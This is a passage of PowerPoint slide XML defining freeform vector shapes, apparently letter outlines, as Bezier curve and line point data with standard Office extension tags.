                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="182"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="116" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="188"/>
                    <a:pt x="77" y="171"/>
                    <a:pt x="77" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="77" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="173" y="19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6" name="Freeform 107">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE8E876-E402-4771-8E26-8D5BE0DBB3BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3206751" y="2579688"/>
              <a:ext cx="100013" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 35 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="23" y="59"/>
                    <a:pt x="35" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131"/>
                    <a:pt x="77" y="112"/>
                    <a:pt x="150" y="11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7" name="Freeform 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249E8846-6F43-446C-BE8F-2E6F323C9303}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3317876" y="2541588"/>
              <a:ext cx="87313" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 21 h 305"/>
                <a:gd name="T2" fmla="*/ 99 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 16 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 31 h 305"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 31 h 305"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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305">
                  <a:moveTo>
                    <a:pt x="119" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="305"/>
                    <a:pt x="204" y="305"/>
                    <a:pt x="204" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="275"/>
                    <a:pt x="192" y="275"/>
                    <a:pt x="184" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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8" name="Freeform 109">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B65A59B-37E1-42BC-8098-8232DEF22287}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3421064" y="2541588"/>
              <a:ext cx="101600" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 239"/>
                <a:gd name="T1" fmla="*/ 31 h 305"/>
                <a:gd name="T2" fmla="*/ 219 w 239"/>
                <a:gd name="T3" fmla="*/ 31 h 305"/>
                <a:gd name="T4" fmla="*/ 239 w 239"/>
                <a:gd name="T5" fmla="*/ 16 h 305"/>
                <a:gd name="T6" fmla="*/ 219 w 239"/>
                <a:gd name="T7" fmla="*/ 0 h 305"/>
                <a:gd name="T8" fmla="*/ 160 w 239"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 140 w 239"/>
                <a:gd name="T11" fmla="*/ 15 h 305"/>
                <a:gd name="T12" fmla="*/ 160 w 239"/>
                <a:gd name="T13" fmla="*/ 31 h 305"/>
                <a:gd name="T14" fmla="*/ 172 w 239"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 172 w 239"/>
                <a:gd name="T17" fmla="*/ 132 h 305"/>
                <a:gd name="T18" fmla="*/ 66 w 239"/>
                <a:gd name="T19" fmla="*/ 132 h 305"/>
                <a:gd name="T20" fmla="*/ 66 w 239"/>
                <a:gd name="T21" fmla="*/ 31 h 305"/>
                <a:gd name="T22" fmla="*/ 79 w 239"/>
                <a:gd name="T23" fmla="*/ 31 h 305"/>
                <a:gd name="T24" fmla="*/ 99 w 239"/>
                <a:gd name="T25" fmla="*/ 16 h 305"/>
                <a:gd name="T26" fmla="*/ 79 w 239"/>
                <a:gd name="T27" fmla="*/ 0 h 305"/>
                <a:gd name="T28" fmla="*/ 20 w 239"/>
                <a:gd name="T29" fmla="*/ 0 h 305"/>
                <a:gd name="T30" fmla="*/ 0 w 239"/>
                <a:gd name="T31" fmla="*/ 16 h 305"/>
                <a:gd name="T32" fmla="*/ 20 w 239"/>
                <a:gd name="T33" fmla="*/ 31 h 305"/>
                <a:gd name="T34" fmla="*/ 32 w 239"/>
                <a:gd name="T35" fmla="*/ 31 h 305"/>
                <a:gd name="T36" fmla="*/ 32 w 239"/>
                <a:gd name="T37" fmla="*/ 275 h 305"/>
                <a:gd name="T38" fmla="*/ 20 w 239"/>
                <a:gd name="T39" fmla="*/ 275 h 305"/>
                <a:gd name="T40" fmla="*/ 0 w 239"/>
                <a:gd name="T41" fmla="*/ 290 h 305"/>
                <a:gd name="T42" fmla="*/ 20 w 239"/>
                <a:gd name="T43" fmla="*/ 305 h 305"/>
                <a:gd name="T44" fmla="*/ 79 w 239"/>
                <a:gd name="T45" fmla="*/ 305 h 305"/>
                <a:gd name="T46" fmla="*/ 99 w 239"/>
                <a:gd name="T47" fmla="*/ 290 h 305"/>
                <a:gd name="T48" fmla="*/ 79 w 239"/>
                <a:gd name="T49" fmla="*/ 275 h 305"/>
                <a:gd name="T50" fmla="*/ 66 w 239"/>
                <a:gd name="T51" fmla="*/ 275 h 305"/>
                <a:gd name="T52" fmla="*/ 66 w 239"/>
                <a:gd name="T53" fmla="*/ 162 h 305"/>
                <a:gd name="T54" fmla="*/ 172 w 239"/>
                <a:gd name="T55" fmla="*/ 162 h 305"/>
                <a:gd name="T56" fmla="*/ 172 w 239"/>
                <a:gd name="T57" fmla="*/ 275 h 305"/>
                <a:gd name="T58" fmla="*/ 160 w 239"/>
                <a:gd name="T59" fmla="*/ 275 h 305"/>
                <a:gd name="T60" fmla="*/ 140 w 239"/>
                <a:gd name="T61" fmla="*/ 290 h 305"/>
                <a:gd name="T62" fmla="*/ 160 w 239"/>
                <a:gd name="T63" fmla="*/ 305 h 305"/>
                <a:gd name="T64" fmla="*/ 219 w 239"/>
                <a:gd name="T65" fmla="*/ 305 h 305"/>
                <a:gd name="T66" fmla="*/ 239 w 239"/>
                <a:gd name="T67" fmla="*/ 290 h 305"/>
                <a:gd name="T68" fmla="*/ 219 w 239"/>
                <a:gd name="T69" fmla="*/ 275 h 305"/>
                <a:gd name="T70" fmla="*/ 207 w 239"/>
                <a:gd name="T71" fmla="*/ 275 h 305"/>
                <a:gd name="T72" fmla="*/ 207 w 239"/>
                <a:gd name="T73" fmla="*/ 3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9" h="305">
                  <a:moveTo>
                    <a:pt x="207" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="219" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="31"/>
                    <a:pt x="239" y="31"/>
                    <a:pt x="239" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="0"/>
                    <a:pt x="227" y="0"/>
                    <a:pt x="219" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="0"/>
                    <a:pt x="140" y="0"/>
                    <a:pt x="140" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="31"/>
                    <a:pt x="152" y="31"/>
                    <a:pt x="160" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="31"/>
                    <a:pt x="99" y="31"/>
                    <a:pt x="99" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="0"/>
                    <a:pt x="87" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="12" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="12" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="305"/>
                    <a:pt x="99" y="305"/>
                    <a:pt x="99" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="275"/>
                    <a:pt x="87" y="275"/>
                    <a:pt x="79" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="275"/>
                    <a:pt x="140" y="275"/>
                    <a:pt x="140" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="305"/>
                    <a:pt x="152" y="305"/>
                    <a:pt x="160" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="219" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="305"/>
                    <a:pt x="239" y="305"/>
                    <a:pt x="239" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="275"/>
                    <a:pt x="227" y="275"/>
                    <a:pt x="219" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="3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9" name="Freeform 110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A089D1F7-80F7-44EA-8AD8-41C6942D1567}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3540126" y="2579688"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 111 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 111 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="174"/>
                    <a:pt x="204" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="154"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="66" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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0" name="Freeform 111">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD5F9D06-5CBA-4889-9E0C-B18DA49BF070}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3654426" y="2579688"/>
              <a:ext cx="80963" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 78 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 93 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 143 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 94 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 162 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 98 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 112 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="112" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="78" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="84"/>
                    <a:pt x="30" y="78"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="46"/>
                    <a:pt x="46" y="30"/>
                    <a:pt x="93" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="143" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="160" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="94" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
